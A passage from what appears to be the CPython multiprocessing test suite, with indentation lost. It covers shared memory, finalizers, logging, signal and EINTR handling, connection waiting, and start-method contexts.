self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
        # bpo-40135: don't define the shared memory block's name, to avoid
        # failures when the multiprocessing tests are run in parallel.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
        # the manager's server should ignore KeyboardInterrupt signals,
        # maintain its connection with the current process, and succeed
        # when asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
        self.assertEqual(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
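        # Finalizers with a non-None exitpriority run at exit, highest
        # priority first and, within equal priorities, most recently
        # registered first; 'c' never appears because its exitpriority is
        # None and its referent is not garbage collected.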
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with threading_helper.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
        self.assertEqual(sio.getvalue(), 'foo')
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
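        # mp_fork_bomb.py starts a process without the
        # "if __name__ == '__main__'" guard: the spawn and forkserver start
        # methods must refuse with RuntimeError, while fork still produces
        # the expected output.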
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
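        # Recursively spawn n generations of processes; each intermediate
        # process closes its copy of the pipe, so only the innermost child
        # reports the size of the after-fork registry.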
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
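            # os.dup() returns the lowest unused descriptor, so repeatedly
            # duplicating pushes the fd above 50; the intermediate
            # descriptors are closed again below.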
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
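        # The no-op handler makes SIGUSR1 interrupt blocking calls without
        # killing the process; the recv() and the large send_bytes() below
        # are expected to carry on as if nothing happened.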
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
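        # Start a child with the given context and verify that it reports
        # the same start method as the context itself.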
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
